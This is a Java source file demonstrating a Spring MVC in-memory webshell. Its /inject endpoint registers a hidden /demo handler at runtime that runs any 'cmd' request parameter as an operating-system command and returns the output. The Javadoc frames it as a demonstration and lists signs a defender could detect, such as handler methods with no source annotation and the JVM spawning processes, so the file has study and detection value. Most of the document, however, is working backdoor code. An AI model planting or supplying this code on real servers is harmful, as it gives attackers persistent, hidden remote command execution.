内存马
package com.naihe.controller;import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;import javax.servlet.http.HttpServletRequest;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Method;@Controller
/**
 * Demonstration of a Spring MVC in-memory webshell ("内存马").
 *
 * <p>Hitting {@code GET /inject} once registers a second handler at {@code /demo}
 * purely through {@link RequestMappingHandlerMapping#registerMapping} at runtime;
 * no {@code @RequestMapping} in the deployed classes declares {@code /demo}. The
 * registered handler runs the value of the {@code cmd} request parameter through
 * {@code Runtime.exec} and returns the process's standard output as the response body.
 *
 * <p>From a defender's point of view the useful observables are: (1) a handler method
 * present in {@code RequestMappingHandlerMapping#getHandlerMethods()} that has no
 * matching annotation in the application's source or bytecode on disk, and (2) child
 * processes being spawned by the JVM in response to HTTP requests. Because the mapping
 * lives only in the running {@code WebApplicationContext}, a restart removes it; a
 * scan of files on disk does not.
 */
public class Demo {
    /**
     * Injects the {@code /demo} handler into the running DispatcherServlet context.
     *
     * @throws NoSuchMethodException if {@code InjectToController.test} cannot be resolved
     *     reflectively (cannot happen for the class as written)
     */
    @ResponseBody
    @RequestMapping(value = "/inject", method = RequestMethod.GET)
    public void inject() throws NoSuchMethodException {
        // 1. Obtain the WebApplicationContext through Spring internals: the
        //    DispatcherServlet stores it as a request attribute (scope 0 is
        //    RequestAttributes.SCOPE_REQUEST).
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        // 2. Look up the RequestMappingHandlerMapping bean from that context.
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
        // 3. Resolve the Method object of the custom controller reflectively.
        Method method = InjectToController.class.getMethod("test");
        // 4. URL pattern the new controller will answer on.
        PatternsRequestCondition url = new PatternsRequestCondition("/demo");
        // 5. HTTP methods allowed for the controller; constructed empty, so presumably
        //    no method restriction applies (original comment says GET/POST).
        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
        // 6. Register the controller dynamically, in memory only. After this call the
        //    mapping exists nowhere except inside the live handler-mapping registry.
        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
        InjectToController injectToController = new InjectToController();
        mappingHandlerMapping.registerMapping(info, injectToController, method);
    }

    /**
     * The dynamically registered handler. Declared as a non-static inner class, so
     * every instance carries a hidden reference to the enclosing {@code Demo}.
     * {@code @ResponseBody} on the type makes the return value of {@link #test()} the
     * raw HTTP response body.
     */
    @ResponseBody
    public class InjectToController {
        public InjectToController() {
        }

        /**
         * Executes the {@code cmd} request parameter as an OS command and returns its
         * standard output. This is the payload a detection rule should key on: an HTTP
         * request followed by process creation from the JVM.
         *
         * @return the command's stdout, lines concatenated without separators
         *     (readLine strips line terminators)
         * @throws Exception on any I/O or process failure
         */
        public String test() throws Exception {
            // Fetch the current HttpServletRequest from the thread-bound request attributes.
            HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
            InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            InputStreamReader isr = new InputStreamReader(is, "UTF-8");
            BufferedReader br = new BufferedReader(isr);
            String str = "";
            String line = "";
            while ((line = br.readLine()) != null) {
                str += line;
            }
            // Closing br also closes the wrapped isr; only stdout is read, stderr is ignored.
            is.close();
            br.close();
            return str;
        }
    }
}
效果